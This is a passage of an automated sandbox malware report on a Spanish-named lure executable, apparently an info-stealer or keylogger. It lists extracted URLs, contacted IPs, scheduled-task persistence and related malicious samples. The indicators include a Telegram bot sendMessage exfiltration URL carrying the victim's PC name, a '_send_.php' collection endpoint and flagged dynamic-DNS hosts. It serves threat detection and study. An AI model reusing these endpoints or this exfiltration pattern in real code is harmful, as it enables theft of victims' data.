                                      http://www.founder.com.cn/cn/bTheNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgQGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/botNuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designers?Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.tiro.comNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designersNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E2000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000422F000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004386000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000043D3000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004257000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004513000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004321000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.000000000436E000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004396000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.goodfont.co.krNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://chrome.google.com/webstore?hl=enNuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://varders.kozow.com:8081Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.sajatypeworks.comNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.typography.netDNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.founder.com.cn/cn/cTheNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.galapagosdesign.com/staff/dennis.htmNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20aQGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallNuevo pedido.exe, 00000009.00000002.4148285320.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000438C000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004232000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000042FC000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044CB000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://checkip.dyndns.org/qNuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.galapagosdesign.com/DPleaseNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.ascendercorp.com/typedesigners.htmlNuevo pedido.exe, 00000000.00000002.1736143627.00000000058E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.fonts.comNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.sandoll.co.krNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.urwpp.deDPleaseNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.zhongyicts.com.cnNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNuevo pedido.exe, 00000000.00000002.1730142640.00000000028F9000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1776750263.0000000003119000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.sakkal.comNuevo pedido.exe, 00000000.00000002.1736270644.0000000005920000.00000004.00000020.00020000.00000000.sdmp, Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.org/xml/Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003151000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.office.com/Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.fontbureau.comNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://checkip.dyndns.orgQGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E2000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000422F000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004386000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000043D3000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004257000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004513000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004321000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.000000000436E000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004396000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.carterandcone.comlNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://aborters.duckdns.org:8081Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      unknown
                                                                                                      http://www.fontbureau.com/designers/cabarga.htmlNNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.founder.com.cn/cnNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.fontbureau.com/designers/frere-user.htmlNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://51.38.247.67:8081/_send_.php?LNuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://anotherarmy.dns.army:8081Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: phishing
                                                                                                            unknown
                                                                                                            http://www.jiyu-kobo.co.jp/Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://reallyfreegeoip.org/xml/8.46.123.189$QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003301000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000032BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://reallyfreegeoip.orgQGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003301000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.fontbureau.com/designers8Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesNuevo pedido.exe, 00000009.00000002.4148285320.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000438C000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004232000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000042FC000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044CB000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedNuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      149.154.167.220
                                                                                                                      api.telegram.orgUnited Kingdom
                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                      104.21.16.1
                                                                                                                      reallyfreegeoip.orgUnited States
                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                      193.122.130.0
                                                                                                                      checkip.dyndns.comUnited States
                                                                                                                      31898ORACLE-BMC-31898USfalse
                                                                                                                      50.31.176.103
                                                                                                                      unknownUnited States
                                                                                                                      23352SERVERCENTRALUStrue
                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                      Analysis ID:1586800
                                                                                                                      Start date and time:2025-01-09 16:35:05 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 9m 31s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:19
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:Nuevo pedido.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@21/15@3/4
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 288
                                                                                                                      • Number of non-executed functions: 24
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.56.254.164, 4.175.87.197, 20.109.210.53, 13.107.246.45
                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                      • VT rate limit hit for: Nuevo pedido.exe
                                                                                                                      TimeTypeDescription
                                                                                                                      10:35:58API Interceptor5362093x Sleep call for process: Nuevo pedido.exe modified
                                                                                                                      10:36:00API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                                                      10:36:03API Interceptor321171x Sleep call for process: QGVhHsAOjb.exe modified
                                                                                                                      15:36:01Task SchedulerRun new task: QGVhHsAOjb path: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      149.154.167.220Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        gem1.exeGet hashmaliciousUnknownBrowse
                                                                                                                          Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          104.21.16.1JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                                                                                          193.122.130.0VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          checkip.dyndns.comCTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 132.226.8.169
                                                                                                                                          Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • 193.122.6.168
                                                                                                                                          December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 193.122.6.168
                                                                                                                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 193.122.6.168
                                                                                                                                          BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 158.101.44.242
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.8.169
                                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 132.226.8.169
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          reallyfreegeoip.orgCTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.96.1
                                                                                                                                          Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.80.1
                                                                                                                                          Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • 104.21.96.1
                                                                                                                                          December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.48.1
                                                                                                                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          api.telegram.orgBenefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          gem1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          TELEGRAMRUBenefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          gem1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          DyM4yXX.exeGet hashmaliciousVidarBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          CLOUDFLARENETUSBenefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.155.59
                                                                                                                                          https://ccml.io/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.24.14
                                                                                                                                          http://readermodeext.infoGet hashmaliciousUnknownBrowse
